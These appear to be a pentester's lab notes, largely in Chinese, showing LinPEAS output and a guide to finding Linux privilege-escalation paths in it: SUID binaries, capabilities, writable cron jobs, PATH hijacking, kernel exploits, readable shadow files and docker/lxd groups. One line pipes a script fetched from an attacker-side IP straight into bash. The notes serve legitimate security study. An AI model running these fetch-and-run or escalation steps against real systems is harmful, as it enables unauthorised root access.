/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
  #)There are more creds/passwds files in the previous parent folder

/usr/share/doc/git/contrib/credential

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
                                                                                                                                                                                              
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
                                                                                                                                                                                              
╔══════════╣ Searching passwords inside logs (limit 70)
Binary file /var/log/journal/06774f23bd654b25a296a616308d2acd/user-1001.journal matches                                                                                                       
[   35.196999] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[   36.188414] systemd[1]: Started Forward Password Requests to Wall Directory Watch.



                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════                                                                                                            
                                ╚════════════════╝                                                                                                                                            
Regexes to search for API keys aren't activated, use param '-r'

解析 LinPEAS 输出的颜色和内容(颜色在ssh中显示)

LinPEAS 使用颜色和分段显示信息。以下是每种颜色的含义：

• 红色高亮：表示可能的严重漏洞或直接的提权机会，需要优先关注。
• 黄色高亮：可能需要进一步验证的潜在漏洞或异常配置。
• 绿色高亮：显示系统配置信息，例如网络、内核和服务信息，有助于了解目标环境。

LinPEAS 返回的信息确实非常详细，通常包含多个可能的提权路径。为了高效解析这些信息，可以从 关键部分和高亮内容 开始筛查。LinPEAS 使用不同的颜色和分段输出，帮助我们快速找到潜在的提权线索。以下是解析 LinPEAS 输出的详细步骤和重点关注的部分。

---

1. 将 LinPEAS 输出保存为文件，便于查找关键字

如果直接在终端查看输出不方便，可以将 LinPEAS 输出重定向到文件中，以便后续使用 grep 等命令快速筛选关键字：

curl http://10.10.14.24/linpeas.sh | bash > linpeas_output.txt

保存后，可以使用文本编辑器（如 vim）或命令行工具（如 less、grep）查看和筛选信息。

---

2. 解析 LinPEAS 输出的颜色和内容

LinPEAS 使用颜色和分段显示信息。以下是每种颜色的含义：

• 红色高亮：表示可能的严重漏洞或直接的提权机会，需要优先关注。
• 黄色高亮：可能需要进一步验证的潜在漏洞或异常配置。
• 绿色高亮：显示系统配置信息，例如网络、内核和服务信息，有助于了解目标环境。

---

3. 重点检查项及常见关键字

可以按以下重点检查项依次查找和筛选，快速锁定提权路径：

1. SUID / SGID 文件

• SUID（Set User ID）和 SGID（Set Group ID）权限允许程序以文件所属用户或用户组的权限执行，可能带来提权机会。
• 使用 grep 筛选输出中的 SUID 文件：

  grep -i "SUID" linpeas_output.txt

  重点关注：通常会重点检查 /bin/bash、vim、nmap、find 等 SUID 文件是否存在，可以利用这些程序的 SUID 提权。

2. Capabilities

• Capabilities 是 Linux 上一种细粒度权限控制机制，例如 cap_setuid、cap_net_bind_service。
• 使用 grep 查看带 Capabilities 的文件信息：

grep -i "capabilities" linpeas_output.txt

重点关注：尤其是 Python、Perl 等解释器或可执行文件带有 cap_setuid 能力，可以尝试切换到 root 用户进行提权。

3. Cron 作业和定时任务

• Cron 作业和计划任务如果配置不当，可能允许低权限用户编辑或执行具有 root 权限的任务脚本。
• 查找 Cron 相关的内容：

grep -i "cron" linpeas_output.txt

重点关注：如果发现由 root 用户执行的任务脚本（如 /etc/cron.d/*、/etc/crontab）却由低权限用户可写，可以通过编辑脚本内容获得 root 权限。

4. PATH 配置与环境变量

• LinPEAS 会检查 PATH 变量配置，查看是否包含可写目录。若 PATH 中包含低权限用户可写目录，则可以将恶意程序放入目录中，劫持系统命令。
• 查找 PATH 信息：

grep -i "path" linpeas_output.txt

重点关注：若 PATH 包含当前用户可写路径，可以通过添加自定义的恶意命令来进行提权。

5. 内核和服务版本

• LinPEAS 会检测系统的内核版本和正在运行的服务版本，这些版本信息可以帮助我们确定系统是否存在已知漏洞。
• 查找系统内核版本信息：

  grep -i "kernel" linpeas_output.txt

• 重点关注：若内核版本或特定服务版本存在已知漏洞，可以尝试使用对应的漏洞利用代码提权（例如 Dirty COW、OverlayFS 等内核漏洞）。

6. 敏感文件权限

• LinPEAS 会检查关键文件的权限配置，如 /etc/shadow、/etc/passwd、.ssh 文件等。
• 查看关键文件权限是否不当：

  grep -i "shadow" linpeas_output.txt

  重点关注：如果 /etc/shadow、/etc/passwd 文件权限设置错误或当前用户可以读取，可能可以直接读取密码 hash 值或增加新用户。

7. 用户和组权限

• LinPEAS 会列出系统中的用户和组信息，帮助我们了解当前用户是否属于具有特权的组。
• 使用 grep 查找组信息：

  grep -i "group" linpeas_output.txt

  重点关注：查看当前用户是否属于特权组，例如 docker、lxd，这些组可以被利用来获取更高权限。

提权

同上